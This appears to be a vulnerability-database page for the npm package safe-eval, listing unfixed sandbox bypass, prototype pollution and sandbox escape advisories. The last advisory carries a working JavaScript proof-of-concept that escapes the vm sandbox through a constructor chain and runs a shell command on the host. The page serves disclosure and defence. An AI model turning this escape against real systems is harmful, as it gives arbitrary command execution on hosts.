safe-eval@0.4.0

Safer version of eval()

  • latest version

    0.4.1

  • first published

    10 years ago

  • latest version published

    7 years ago

  • licenses detected

  • Direct Vulnerabilities

    Known vulnerabilities in the safe-eval package. This does not include vulnerabilities belonging to this package’s dependencies.

    Vulnerability / Vulnerable Version
    • High severity: Sandbox Bypass

    safe-eval is a Safer version of eval()

    Affected versions of this package are vulnerable to Sandbox Bypass due to improper input sanitization. The bypass is reached through prototype pollution, and exploiting it may result in remote code execution (RCE) on the host.

    Vulnerable functions:

    __defineGetter__, stack(), toLocaleString(), propertyIsEnumerable.call(), valueOf().

    How to fix Sandbox Bypass?

    There is no fixed version for safe-eval.

    Vulnerable versions: * (all published versions)
    • High severity: Prototype Pollution


    Affected versions of this package are vulnerable to Prototype Pollution via the safeEval function, due to improper sanitization of its parameter content.

    How to fix Prototype Pollution?

    There is no fixed version for safe-eval.

    Vulnerable versions: * (all published versions)
    • High severity: Prototype Pollution


    Affected versions of this package are vulnerable to Prototype Pollution: an attacker who controls the code passed to the safeEval function can add or modify properties of Object.prototype. This is because safeEval relies on the Node.js vm module for isolation, and vm does not prevent evaluated code from reaching and modifying Object.prototype.

    How to fix Prototype Pollution?

    There is no fixed version for safe-eval.

    Vulnerable versions: * (all published versions)
    • High severity: Sandbox Escape


    Affected versions of this package are vulnerable to Sandbox Escape. It is possible for an attacker to run an arbitrary command on the host machine.

    PoC by Anirudh Anand (for Node 12.13.0)

    const safeEval = require('safe-eval');
    
    // Payload that the sandbox hands back to the host. Everything in here runs inside
    // the vm context and cannot see `process`; the escape happens later, when HOST
    // code inspects the returned Error object.
    const theFunction = function() {
       const bad = new Error();
       // With a null prototype, Node 12's util.inspect sees an Error without a
       // constructor, reads `stack` and calls stack.match(regex) on it.
       bad.__proto__ = null;
       bad.stack = {
          match(outer) {
             // `outer` is a host-realm RegExp: its constructor chain leads to the host
             // Function constructor, which evaluates in the host realm and returns the
             // real `process`. The command output is thrown so it surfaces as the
             // uncaught exception's value.
             throw outer.constructor.constructor("return process")().mainModule.require('child_process').execSync('whoami').toString();
          }
       };
       return bad;
    };
    
    const untrusted = `(${theFunction})()`;
    // console.log() is the host-side inspection that triggers the escape.
    console.log(safeEval(untrusted));
    

    How to fix Sandbox Escape?

    There is no fixed version for safe-eval.

    Vulnerable versions: * (all published versions)